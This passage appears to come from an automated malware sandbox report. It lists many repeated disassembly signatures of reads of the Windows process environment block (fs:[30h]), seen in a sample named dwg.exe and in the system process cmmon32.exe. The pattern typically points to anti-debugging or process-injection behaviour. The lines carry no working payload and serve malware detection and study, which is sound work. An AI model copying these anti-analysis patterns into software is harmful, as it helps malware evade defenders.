      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E183884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E183884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1490AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1058EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E124120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E124120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1869A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1941E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_0056583D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_00562CBF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_005649AA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_00564A27 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_00564EF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_044FA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_0455C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_0455C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_044E746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_0459740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_0459740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_0459740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04581C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04546C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_044FBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04598CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_045814FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 10_2_04546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04503D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04543540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0454A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04546DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04578DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04508EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045446A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04590EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045037F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04582073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04591074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04547016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04594015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0455B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04543884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045090AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045541E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA185 mov eax, dword ptr fs:[00000030h]
